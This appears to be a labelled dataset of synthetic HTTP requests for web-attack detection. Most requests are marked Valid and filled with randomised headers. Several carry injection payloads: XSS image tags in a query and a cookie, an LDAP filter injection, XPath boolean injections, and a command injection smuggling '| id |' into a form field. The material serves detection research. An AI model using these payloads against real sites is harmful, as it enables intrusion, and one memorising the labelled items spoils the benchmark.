User-Agent: Mozilla/7.0 (X11; U; Linux i386 7.7; bo-3h; rv:0.3.8) Gecko/56787196
UA-CPU: x86
UA-Disp: 137,543,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 549x140
Via: HTTP/5.4 www.esrgh.js, FTP/5.3 30.93.225.4:4466, 9.1 www.swgeis.tiff
Transfer-Encoding: identity
Upgrade: fntcu/3.4, wotta/7.7, aL8n/3.8
Warning: 306 201.137.88.255 "tntlel" 
X-Forwarded-For: 229.229.25.15
X-Serial-Number: 0352610
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 27145
Start - Id: 19974
class: Valid
GET /yc3aSLcetgt/SP/kBF9wjY/ip/op3GD.dv/svgN5Fd@U.OFSF-QPoC/U9SlofkIlrdiv3/yQX_HW@F9o2lhHN.cgi?TW-OILBY8andbN=7.4S7gAT7oDR&etoodhAgmbts=gDR&an5hbsttm=58 HTTP/1.0
Host: 13.248.155.138
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman, x-mac-greek;q=0.3, windows-1253;q=0.0
Accept-Encoding: *;q=0.9
Accept-Language: joHeg-lhpenmr, ytr7do-ha, edys8-l3;q=0.9
Cache-Control: no-transform
Client-ip: 246.222.154.154
Cookie: evg=3betweeni+wt;G58l2<s;sx=30048826
Cookie2: $Version="786"
Date: Thu, 11 May 06 15:09:13 UTC
ETag: "fRp.j_Sd1JFJKYu"
Expect: 100-continue
From: z3on9@atfseid.cz
If-Modified-Since: Sun, 08 Feb 04 23:34:07 GMT
If-Unmodified-Since: Thu, 06 Sep 07 11:15:40 CET
If-Match: "HQA1hJ2nMhbu_pD"
If-None-Match: "HrvdU7TyPg9CTxkLc"
If-Range: Mon, 18 Oct 04 15:29:32 UTC
Max-Forwards: 75
MIME-Version: 2.6
Pragma: cE2Eol=matrah
Proxy-Authorization: NTLM bm56ZW9haG4wbXNhb250ZWJoZWhobXRoemR3dGhsa3R0dXcxdGVuc3JhZWxsaQ==
Authorization: Basic VDBhb3djdGQ6c2F6TlRobm8=
Range: 9-166,607515-,166-662139
Referer: /lshEzhAm/leiea/aiHeten/a9lfi.jpg
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: gooecdehdatPnN1a
UA-CPU: StrongARM
UA-Disp: 773,5885,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1394x7760
Via: HTTP/8.3 www.igqhz.js, HTTP/3.5 www.tHwrm.htm
Transfer-Encoding: compress
Upgrade: scjah/2.9, rqic/8.5, Eucg/8.4, 50h/6.8
Warning: 269 www.sio9tfe.jpeg "ertsEceeNmilreasie" 
X-Forwarded-For: 39.120.128.67
X-Serial-Number: 81008512960196254
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19974
Start - Id: 24593
class: Valid
GET /fuT3o.pK1n/d41Us7W/o4vPpIwm-42Rz_s/exm.xmPdVoFy/ea/g0afz8QM5.asp?8e4erdmiWntrsn=zriJsnt3txsSkhot HTTP/1.0
Host: 226.76.206.156
Connection: iaOheoir
Accept: */*;q=0.0
Accept-Charset: iso-8859-3, gb2312;q=0.2, windows-1252, iso-8859-4;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: readNoy=l9ssRh
Client-ip: 144.153.248.99
Cookie: mgbtetnlezca=oroostyle;rwd2s=0596670235;sfsipOleiauvr7=o=hcjnlbgsoundscript9+asallc;soetiu=7;ayoafantrhsyl=&;npxesy=1
Cookie2: $Version="416"
Date: Wed, 25 Jun 08 22:29:30 CET
ETag: W/"4dS.u20O0Z3P8h."
Expect: eeEemis
From: teiet4@sTvons.de
If-Modified-Since: Mon, 17 Dec 07 02:49:44 UTC
If-Unmodified-Since: Wed, 29 Mar 06 21:50:59 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Sep 05 07:21:32 GMT
Max-Forwards: 0
MIME-Version: 8.0
Pragma: c8zI5='in3en'
Proxy-Authorization: Basic ZWhUTzpqaFF0bGQ=
Authorization: Digest qop=auth
Range: 5150-,581355-
Referer: http://www.1lrt4.com/oa8r/0ssO0rnf.jsp
TE: trailers,chunked,deflate;q=0.1
Trailer: Host
User-Agent: Mozilla/7.8 (Machintosh; U; Mac OS X 8.1; lm-mz; rv:3.7.2) Gecko/68221247
UA-CPU: StrongARM
UA-Disp: 1118,7867,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 699x848
Via: 8zHu/9.9 95.156.66.102, HTTP/2.4 www.vrelem.png
Transfer-Encoding: y3eyt
Upgrade: maOeS/3.9
Warning: 152 www.ooridO.gif "UeeEwtsltb3wwa8sst8o" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 04810456
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24593
Start - Id: 15082
class: Valid
GET /ogtenweGabsu9a/JNfLW-BUwnKc_TU/iit1Ih/aBe2HgediSnr/iomomwooncutrEda/t8QXsYUKmeNDqAv.htm?OKYAD5E6fQ_N=61252692&neNEgtnues=5606918&Of3ftp4=6331154&W6qbttitmsno=v%5D&anEiLnl=3%27rsamhijtov&eTsanrh=4361&BX3y=ywK&mmc0dc=vNqo&viImegaru=yjR&b9csOityr=4Y6Wcc35KJ HTTP/1.0
Host: 32.24.74.25
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: ks_c_5601-1987;q=0.4, us-ascii;q=0.5
Accept-Encoding: gzip;q=0.7, compress
Accept-Language: *
Cache-Control: max-stale
Client-ip: 24.17.58.159
Cookie: HL1_qvX=ntynaalino0euks;befuoehhss=7881997;orxi=uh/mailapeuyg;2trt9snioo8r=rrN;objectFhr6=zienoftnexw
Cookie2: $Version="87"
Date: Sat, 13 May 06 10:29:27 CET
ETag: W/"V6SQnlPNth6MI3E1aRw"
Expect: 100-continue
From: iotovaam@tsned.org
If-Modified-Since: Fri, 18 May 07 13:03:23 UTC
If-Unmodified-Since: Thu, 18 Dec 08 17:24:21 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2018
MIME-Version: 0.6
Pragma: vosoi5=noCeu6
Proxy-Authorization: NTLM dDdzZXMwbHV4V3I3dG1vZGlyYWVvZmFhaGVzaHNzc3RzZU9XWjBmb2NvSGU=
Authorization: udTdin n90u3g=Lo3d
Range: -3610,072048-063,-8
Referer: http://www.eru4trh.be/e6uays/tmoeheee/ladihpoA/htieP.cfm
TE: trailers,chunked
Trailer: Accept-Charset
User-Agent: Mozilla/7.2 (compatible; Konqueror/8.3; WinNT; lytoez; oegl)
UA-CPU: 68000
UA-Disp: 3763,8529,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0882x4753
Via: 2.1 www.ileEue.htm:4, HTTP/0.3 www.ltt7Oti.tiff, HTTP/0.4 68.154.59.201:0
Transfer-Encoding: riSil
Upgrade: oxpen/0.0
Warning: 116 www.eseDe.htm "27q3Eouttsesl7rsU" 
X-Forwarded-For: 15.61.103.36
X-Serial-Number: 63629752073074
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15082
Start - Id: 11486
class: Valid
GET /e3suIlolEs2/rVwz0k.D7.kyApRScGmQ/rre/hipgcnEhyfcfa3cirtP/Bv%unMQfTAPYV26./ur03n1ktut/dQMANtgjx1nn.0ABpV/teqabjo8gh.css?WHrrai=7986470927&l6ls=eu1dqndj HTTP/1.1
Host: 23.126.55.55
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: haBns-ecqna, cp-mbmily, eaii5aaI-nlytfy;q=0.9, higa-alo, etr-6mitTs;q=0.2
Cache-Control: no-cache
Client-ip: 170.41.229.75
Cookie: 2xp_kWMO=994311;60oRo=pokg8teeats;awhedeqoe=r
Cookie2: $Version="49"
Date: Sun, 30 Sep 07 21:48:25 CET
ETag: "-3tmvwHH0fIma2usr84"
Expect: 100-continue
From: oohw@halud.org
If-Modified-Since: Sat, 24 Jan 09 16:51:53 GMT
If-Unmodified-Since: Tue, 15 Nov 05 03:43:02 UTC
If-Match: "iZVg77N-Re3HwtGXTw@"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 6.0
Pragma: Zichheh='toj'
Proxy-Authorization: Digest qop=ki3naiu
Authorization: NTLM aXM1dHRldWlhaXl1c210aE5pN1RlRW5zVGQyZTE0b0Vkb2VoZTV1
Range: -517746,13-
Referer: http://www.rNlheaa.st/dnietqsh/TnoYd/espLseM/iwltoeme/ltercbM.tiff
TE: deflate;q=0.8
Trailer: From
User-Agent: 8ithVn/8.5.4
UA-CPU: 68000
UA-Disp: 9055,045,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9366x217
Via: nt6/1.5 20.236.131.97, 0.0 www.kusw.htm:2741, 3.0 12.118.206.209
Transfer-Encoding: identity
Upgrade: aio/4.0
Warning: 505 39.129.64.192 "id9nrarEinrmwdsm" 
X-Forwarded-For: 0.47.132.31
X-Serial-Number: 684447475496
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11486
Start - Id: 48021
class: XSS
GET /daf/bkykAJxjJ4/cu3/BbgsoundXC@FXhaving8/0uKemsxWj_sopen7perlY/terzaLg.jpeg?atheeCRa=philsa1r&m.MYnetcatRSe@mFU=66&etibqEuehldmrL=%3Cimg+++dynsrc%3D++%22javascript%3A+++%5Balert++++%28%27oo%27%29%3B%5D+++%22+%3E&tattzTanknussNu=c5%5Dvarr%2F-%5C&zlQeeTba=900582920 HTTP/1.0
Host: 81.18.96.60
Connection: close
Accept: image/gif, application/x-tar
Accept-Charset: macintosh;q=0.3, euc-cn
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=88568
Client-ip: 229.36.28.9
Cookie: jaft8CexrLibt=2770492
Cookie2: $Version="114"
Date: Thu, 17 Mar 05 02:58:46 CET
ETag: "GJ8gcU4@LIDaCNFpkX9Z"
Expect: aVnq
From: uesois@ewrsoxtt.it
If-Modified-Since: Fri, 01 Oct 04 17:30:18 GMT
If-Unmodified-Since: Sat, 22 Sep 07 11:24:24 UTC
If-Match: "ObLaTPHaQn.IRrY"
If-None-Match: *
If-Range: "liCntScoKYa_L@U0n"
Max-Forwards: 9140
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: uedrde k86eh=jiih
Authorization: Digest nonce
Range: 3837-2
Referer: /xWRnadt/otseeb.jsp
TE: chunked;q=0.8
Trailer: Referer
User-Agent: Mozilla/7.7 (compatible; MSIE 7.5; Mac OS X; ftzee8jt; e4uds)
UA-CPU: 68000
UA-Disp: 212,5646,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0874x138
Via: 9.5 255.151.192.53
Transfer-Encoding: gzip
Upgrade: DUyx4/6.1, udlo5/7.2
Warning: 237 106.180.134.229 "4e4socieooaey" "Fri, 14 Dec 07 11:55:14 UTC"
X-Forwarded-For: 177.208.72.84
X-Serial-Number: 698729021
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48021
Start - Id: 12510
class: Valid
GET /IoYZ5O/iUY5MfwallpH/hsIr/uPpoodFqJFj/tET/ercnsWqrdez5rf7o7/imL72/q8Saoe0tddehsoy/i6kZsiyrS8D/cY.QQDtm7hU_QIftw/-kFzr7bq.asp? HTTP/1.1
Host: www.cMqhzo.st
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: identity, compress;q=0.6, identity, compress;q=0.7
Accept-Language: *
Cache-Control: max-stale
Client-ip: 104.30.89.113
Cookie: ensnt=tly;nsnghveta6ephie=umIlsAql;lldisweeyn=it3y ;.zLs5=nE8ehtwqg
Cookie2: $Version="9"
Date: Sat, 30 Oct 04 07:15:57 CET
ETag: W/"Xr-@6gcRG0oeydpwL"
Expect: ttajmaTs
From: deAe@iiia.st
If-Modified-Since: Tue, 08 Nov 05 10:40:11 UTC
If-Unmodified-Since: Thu, 04 Dec 08 17:31:17 GMT
If-Match: "Pk0W_DWtAU_ufKTV"
If-None-Match: "h2Hw6QeWEgUFqA3WjpN"
If-Range: *
Max-Forwards: 6549
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest qop=tlainatN
Authorization: Basic ZGNubzpvbmVh
Range: 9895-033107
Referer: http://saSs.org/croc.jsp
TE: trailers
Trailer: Authorization
User-Agent: ew8isgtodo (ehWsd@rXD; dhhri9dAnM; sdY9ndyg4; wg4udz)
UA-CPU: MIPS
UA-Disp: 634,9417,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 388x558
Via: taum/5.8 www.rahky.js:3
Transfer-Encoding: gzip
Upgrade: hbxi/8.3
Warning: 735 75.83.0.37:89 "hex0od" "Wed, 06 Dec 06 03:12:32 CET"
X-Forwarded-For: 76.244.65.161
X-Serial-Number: 2197491883894
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 12510
Start - Id: 38212
class: LdapInjection
GET /Xanmmaa2.html?afa=dtl%29%28%26%28objectClass+++%3Didd*%29 HTTP/1.0
Host: www.sg0wT90u.ch
Connection: close
Accept: */*;q=0.1
Accept-Charset: utf-8, gb2312, x-mac-cyrillic;q=0.4, windows-1252;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: Qttt-h;q=0.9
Cache-Control: min-fresh=46
Client-ip: 9.211.101.123
Cookie: e98uhsscasq=2;stzdBEd=oHmdaBlie;I4J9K3MTD7wE=pQjK817o-jPE;7yrZbistPm=ne5;positionjvH_2mrcptelnet8vc=wRoUqcx
Cookie2: $Version="98"
Date: Fri, 06 Nov 09 03:57:25 CET
ETag: W/"UStOSs522pUjsYdXz8Jw"
Expect: efooed
From: hnrpa@Dtsdlni.be
If-Modified-Since: Sat, 22 Sep 07 17:46:23 CET
If-Unmodified-Since: Mon, 31 Dec 07 24:31:08 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 10 Jul 09 23:12:56 UTC
Max-Forwards: 8662
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: 5eRiuu etshnsqi=eO4i
Authorization: NTLM ZWVMMnJoZWVDdnZlWGhoZmxZZDJlQXBjZHdsMmNlVHNmTG5vYw==
Range: 1527-875,9678-
Referer: http://www.KatouvO.be/cegnpt/eLtaidrx/sn5o/aiJm0/tt1e4.zip
TE: trailers
Trailer: Warning
User-Agent: SdsU/4.6.5.1.8
UA-CPU: 68000
UA-Disp: 912,7281,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 321x2267
Via: 3.7 www.stxuE.jpg:511, 9.3 www.dnileN.tiff
Transfer-Encoding: identity
Upgrade: mrrUlT/4.8, 7edu/8.3
Warning: 770 111.10.145.180 "gcnref5ut" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38212
Start - Id: 46688
class: XSS
GET /Smplmheujug/r7Ar4/a5L/r8K/oSNVzNNKZ4/tm8_nfq4.aTA5tehn/wiYEE3UFphUqbVrzhfr/ria1S8dtryrb0ldHh/eM@-6QH80t9/oLOvzPKSkG/hu74ZeW.shtml? HTTP/1.1
Host: 163.202.26.119
Connection: close
Accept: audio/*
Accept-Encoding: 
Accept-Language: u-oeuDt, 2ydanp-al1;q=0.1, ssen-5, tzocypf-adstn;q=0.8
Cookie: lt=7Sainrs mnD;rsOhhtysNelro=6;5f73n=<img    src  =  "   livescript:[alert    ('zhc9dS');]    "    >;sssSeE=hi0mw;eh4umtnh=21262205
Date: Thu, 16 Aug 07 02:56:32 UTC
If-Unmodified-Since: Sat, 29 Apr 06 01:29:53 CET
Max-Forwards: 42
Pragma: imr0asli='im'
Referer: http://tdniema.uk/aous/nwbq/Adxtils/omrndnFe/tXoi.exe
User-Agent: atieao2 (pLR-Z5YQI1; ttrA2x; hQ.parj53; ajY.Ll88)

null

End - Id: 46688
Start - Id: 9297
class: Valid
GET /idornnSNaErdsTnusto9/rNuaneewrrztaewKsn/mG.html? HTTP/1.1
Host: www.c4sreh.net
Connection: nnnea
Accept: */*;q=0.3
Accept-Charset: x-mac-turkish, x-mac-icelandic;q=0.6, shift_jis;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 201.8.180.111
Cookie: sS0=t y1;eeeh=(h;QsomIoeeqvtv=r0Zl8dvYik;famPaO=ejoFMWGeiWFk
Cookie2: $Version="35"
Date: Mon, 19 Feb 07 06:52:08 CET
ETag: W/"N9MJ3LQgA0sfWuXi6C"
Expect: ejrw=feEent06;sLesp=hRhwpg
From: clbdsbE@ouRcuroAt.it
If-Modified-Since: Sat, 23 Jun 07 02:03:14 GMT
If-Unmodified-Since: Mon, 30 Nov 09 11:58:58 UTC
If-Match: "ef3IaejodxEq_XHwHn"
If-None-Match: "CNVlA7QBoOefG.E"
If-Range: Mon, 15 Aug 05 24:23:50 GMT
Max-Forwards: 262
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: uwsis atswerih=iylimA
Range: 53-
Referer: http://www.eodeqai7.ch/d2xiia/t7sar/ehyrie.conf
TE: trailers,gzip,gzip;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.8 (X11; U; Open BSD i586 3.4; ni-1a; rv:2.8.9) Gecko/08248112
UA-CPU: 68000
UA-Disp: 5472,2559,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6875x133
Via: FTP/7.7 224.28.165.35, HTTP/2.0 207.132.195.126
Transfer-Encoding: wgeati
Upgrade: ne3a/3.0, ktz/8.6, tsjraE/5.2, hlfe/6.2
Warning: 018 www.Ssi76p.jpeg "nedenrH9ew0rrmthew" "Thu, 13 Sep 07 15:26:18 CET"
X-Forwarded-For: 215.205.82.248
X-Serial-Number: 378312956268
----: ----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 9297
Start - Id: 48607
class: XPathInjection
PUT /efEcVcXQpwhKNmzn5/tNKI2c/wpgjnSjrhjbtsetie/catidto9twoelwn/edNLdD/av/Pieusvb2aTBs9smdcds/tbmnd/eUNcajg2aD_E/uLOdEAj3rH8GWq.r.php4? HTTP/1.1
Content-Length: 399
Content-Language: aePng,t
Content-Encoding: gzip
Content-Location: /irottr9o/otnmi/cdsa2te1.asmx
Content-MD5: cmFhZXBJT3MwYW9lZWVzYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 Jul 06 07:58:55 GMT
Last-Modified: Thu, 14 Oct 04 19:26:24 GMT
Host: www.pRebrds.com
Connection: keep-alive
Accept: application/*, audio/x-wav
Accept-Charset: windows-1250, iso-8859-9
Accept-Encoding: 
Accept-Language: Saenae-rZa;q=0.6, Ti-co, 6rt-ilh;q=0.3
Cache-Control: min-fresh=88
Client-ip: 6.142.29.16
Cookie: QflikephavingdocumentSrHhVl=to;aX5ndemcorrwot=8
Cookie2: $Version="99"
Date: Wed, 02 Jan 08 16:21:44 CET
ETag: W/"W_ZUNoB2CTPdOc.p19R"
Expect: bpagaX=Ixsnlib;lyp7n3K
From: Vdti@z8ourhe.it
If-Modified-Since: Wed, 11 Feb 04 14:20:53 UTC
If-Unmodified-Since: Thu, 04 Mar 04 19:21:51 GMT
If-Match: *
If-None-Match: *
If-Range: "p5R0JJWz7wFOej9Yg"
Max-Forwards: 6606
MIME-Version: 4.8
Pragma: na8n='oaex'
Proxy-Authorization: Basic TWx1Zzpic3JvZWg=
Authorization: odAdE Erng=Eo3n7eeN
Range: 3-574
Referer: http://www.aouIaEn.org/bueecinh/2e8iitja/4est.jpg
TE: trailers,trailers,gzip
Trailer: Referer
User-Agent: Mozilla/3.5 (Machintosh; U; PPC Mac OS X 7.3; Dr-Gs; rv:9.3.2) Gecko/06453918
UA-CPU: Sparc
UA-Disp: 7774,1775,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 853x5228
Via: dmnaa/6.2 www.eaauhil.html, mny/8.0 241.58.186.24
Transfer-Encoding: deflate
Upgrade: 98segm/6.0, emke/7.4, V6urw/1.6, y7u/6.3, erasgo/2.6
Warning: 405 60.173.106.50 "flsldMhforut" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 9078017597959591
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

jetllebttx=eklYRamhn-7w&ooP38u2losdsHrt=ihraimh&giEmar=cu@z&Eabonrz4eSaaaji=oSKLs29&xW1Xii.CBdrop=f7pr?ettane&eipyr4eher=8242&heErupbh=dI03Akq&eoinselnXee=nuratse'    or  (i     <  count(riAAl/child::text())     and     j    <  count(oe0onI/child::comment())   and    k  <  count(aanvy/child::*)   )    or    'Tr'   ='     aisn9'    or

End - Id: 48607
Start - Id: 43080
class: OsCommanding
POST /hluDQeyrt8onoqn/i0bxiyeusvqhehtlhewo/ei5sytcLfett/epbpLXFX/h8DEFEFdelete9QS/0Vn%u8eTS/gSr.shtml? HTTP/1.0
Content-Length: 174
Content-Language: yr
Content-Encoding: identity
Content-Location: http://tmnteve.cz/iGarn/ehnzdrsh/oYoG9/t6n78eMh/geeiR.nsf
Content-MD5: bnl3ZG9uaHdkczlhbzNlMA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 May 05 24:17:51 CET
Last-Modified: Wed, 28 Jan 09 17:47:41 GMT
Host: 160.60.85.173:80
Connection: close
Accept: audio/*, audio/basic, text/html;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eoonrtnr-oceaTai;q=0.9, yee3rooj-rpnhDsay, nmemm-t;q=0.3, atmtw-icidarp;q=0.7
Cache-Control: nt4='Ni'
Client-ip: 56.53.104.65
Cookie: Vopeninput-lkK29=6138549;F0u3ifnqe=qewinntDe(a;osaosNttb9l=eiftutrfhno;awto3unals=hexcgttbodyiO
Cookie2: $Version="0"
Date: Fri, 16 Apr 04 12:36:39 CET
ETag: W/"eMtiP-Ze0_ie0Pb27"
Expect: 100-continue
From: twrTzya@l1npan.ch
If-Modified-Since: Sat, 05 Nov 05 05:24:27 CET
If-Unmodified-Since: Thu, 26 Apr 07 14:46:38 CET
If-None-Match: "z-v_VeDmzp2WdrNt"
If-Range: *
Max-Forwards: 8422
Pragma: no-cache
Authorization: Basic YXNyaDp0cnB0Ng==
Range: -57,-072,-891
Referer: http://roeoh.org/6Nsh/xazh.jpg
Trailer: Pragma
User-Agent: Mozilla/9.9 (Windows; U; Windows NT 4.9; lf-wc; rv:7.3.1) Gecko/75247620
UA-OS: Win98
Via: 7.1 168.214.180.167, aot/9.1 205.104.158.48
Transfer-Encoding: L1no
Warning: 478 www.atuy.css "969s" 
X-Forwarded-For: 228.11.44.229
~~~~~: ~~~~~~~~~~~~~~~

aHh3eJOenDdN4=u8B&ogaymsyeur=seeSx&AdeskDfQ9entea=|     id   |&BsiS9mAey=705360&1yi=62&nhde4ghhmsSti=hNs&niegtalwahalevy=mesmhidimlsi0bcsD&hAooiiende1scT=n-connectib$at

End - Id: 43080
Start - Id: 2158
class: Valid
GET /hBcwD0BUbl-_X4q/hNPeKtSICtoUPHRI2mZ/8GqpupdatewVQHvu.sh?@openS6Owvar8Qjw.=eyh HTTP/1.1
Host: 0.192.21.77:80
Connection: keep-alive
Accept: audio/basic;q=0.1, image/gif, image/png;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=018
Client-ip: 45.56.237.127
Cookie: o0Eecroe1mhhltl=26640;nFyweDyAWQ8G=22;R2NWrI=7;fUFBVD5Ppc=6712;eaeqde=ea-W
Cookie2: $Version="400"
Date: Fri, 15 May 09 24:59:16 CET
ETag: W/"4eoX3FjnHzJ3RDSMPkMS"
Expect: rcrct25y
From: cwaupt@0tmyctatse.net
If-Modified-Since: Mon, 14 Dec 09 08:55:18 UTC
If-Unmodified-Since: Sun, 01 Mar 09 11:54:12 CET
If-Match: *
If-None-Match: *
If-Range: "VBdA4f_F-scrUArKmM9"
Max-Forwards: 7
MIME-Version: 3.0
Pragma: d='tk'
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: -5,61-,-809
Referer: http://www.ale5lA2.org/ilepdkDh/hayteq/eymf12d/ayfne/in2oy.nsf
TE: gzip
Trailer: Connection
User-Agent: snsessidd
UA-CPU: MIPS
UA-Disp: 5906,5130,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 114x854
Via: 1.0 www.te8vd.html, 3.5 26.68.128.116
Transfer-Encoding: identity
Upgrade: zienis/1.2, iyetd7/7.3, isE8gA/1.8, ehh9m4/7.8, eeb/5.1
Warning: 722 4.238.114.92 "eaedoiYafssfmr6w" 
X-Forwarded-For: 130.173.148.175
X-Serial-Number: 9895241717803854226
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2158
Start - Id: 20423
class: Valid
GET /K8D6Vp/rv9PdZUj6J/Js/taeculasauuo/nACsnsesa86nepeez/ihoHeFinmie0jop/dieslolnihn/nwKbpn.Kc4.dll? HTTP/1.1
Host: 146.27.3.199
Connection: close
Accept: video/mpeg;q=0.6, text/xml, video/*;q=0.1
Accept-Charset: iso-8859-8;q=0.8
Accept-Encoding: deflate;q=0.8, identity, compress;q=0.6, identity;q=0.5, deflate;q=0.4
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 166.157.192.211
Cookie: GeN=arrpoterb9qlvbeBoo
Cookie2: $Version="64"
Date: Sun, 09 Jul 06 07:42:51 UTC
ETag: W/"h4l0fj-5lUPrK7X9JUr"
Expect: egitxr1=t1awi;qrujay=phpg
From: NhLvnifh@n8l5ldudth.ch
If-Modified-Since: Sun, 17 May 09 10:47:21 GMT
If-Unmodified-Since: Wed, 11 May 05 20:28:50 CET
If-Match: "Lz0h-X8jl6k0-.L"
If-None-Match: "O0uZXzGwh4W-8YTh"
If-Range: Fri, 28 Sep 07 16:12:40 UTC
Max-Forwards: 8095
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: tlst reIete=haAeP1te
Authorization: Basic c3RheW5sYWE6ZERhdWJzZQ==
Range: 06141-
Referer: /itpbh0o/6htif/ldntni.php4
TE: chunked,chunked
Trailer: Pragma
User-Agent: Mozilla/4.9 (Windows; U; Win 9x 7.9; kr-lT; rv:9.6.2) Gecko/73660216
UA-CPU: 68000
UA-Disp: 241,776,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 720x338
Via: 2.5 134.48.127.150, 0.7 168.87.197.184, U2a6e/1.9 www.sb7hIo1.tiff
Transfer-Encoding: elact; dgicdoM=edooo7nE
Upgrade: fwe/7.0
Warning: 697 www.lposey.gif "9aTda2rs" "Tue, 20 Dec 05 18:07:02 UTC"
X-Forwarded-For: 92.6.156.80
X-Serial-Number: 9148290691910332501
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20423
Start - Id: 50022
class: XPathInjection
PUT /7ww096SwwAopenx07x/HW-zhi34.g4xsSt/dpAnI56L/eSDkg/fDk/eucaLuet/3ACincludej.jpeg? HTTP/1.0
Content-Length: 205
Content-Language: ete,tn4nu,AsqlrCTd
Content-Encoding: compress
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 25 Mar 08 18:16:27 GMT
Host: 125.158.113.9:80
Connection: Aialvse
Accept: video/*, image/*;q=0.4
Accept-Charset: *
Accept-Language: (i     <    count(aEojio/child::text())    and   j     <   count(5i/child::comment()) and    k     < count(tsr/child::*)   )
Cache-Control: no-store
Cookie: 5tceotaat1=1147;olUl=003240;Ga6dfn=qgz;login35b=rwey;gqD=6463994
Date: Thu, 01 Apr 04 03:19:12 CET
Expect: 100-continue
Referer: http://eetia.com/qdohlhut/nhgestl.asp
TE: gzip;q=0.8,trailers,gzip
User-Agent: Mozilla/7.3 (Machintosh; U; PPC Mac OS X 1.6; tt-1n; rv:6.6.0) Gecko/15475613
UA-Color: color32
Upgrade: odsrn/7.3, noifE/8.7
----: ------------

fEdce=9CjB&nGOis=awqiuiernai&R7IH21TVj-link=euE.kAqXJQnX&imahnasdx=tIeraeooesvqgyie&kwr8scuohzri=thEefd~&nseYdfjsief63tO=bIlyqbxdtV&yyzCA9=mth% l1T&mai=nkVIzwFJCWvY&awleaYtog=41&vo83osean=9/rqve r vu

End - Id: 50022
Start - Id: 27171
class: Valid
GET /hyE/rK/rplhox2jl82cathndEm/n0bi/dQ15qKL8rnXA/TrO0teYsuf/tuaaQ3gwrAkueen/zK6WUETAgn95oraE2wUX/loetefronqrs/e6NhIqeItRmugs2e.php4?n8ay9seh=o2iecinputeedrud&dmrlzadoystz=162&rhBNKl.=urnmo&gNfyI=iie&hewambgadiaote=ongp&enIaisrTto=syewcin4&na=sXx&-IR3lbody=insertG5nj HTTP/1.1
Host: 79.176.158.168
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate, identity, gzip, compress
Accept-Language: heojlim-6tyy8are;q=0.9, iaoye-odcAwhn
Cache-Control: eTioLcto='Oxnet'
Client-ip: 30.130.235.21
Cookie: Ko.qOuApassthruZ=41979;kfhlneedb3raa=tettmriVbodr;ZwKgoiV=dsiuwsAdno5ce9mt;ty=xpci2
Cookie2: $Version="572"
Date: Fri, 24 Jul 09 14:19:04 CET
ETag: "f3dTSwKWN8d2GumF3R-"
Expect: 100-continue
From: NnNme@unaivpat.ch
If-Modified-Since: Wed, 04 Nov 09 22:08:00 UTC
If-Unmodified-Since: Tue, 06 Feb 07 04:49:04 UTC
If-Match: "TL9wcdfaej5MFfDvDYKZ"
If-None-Match: *
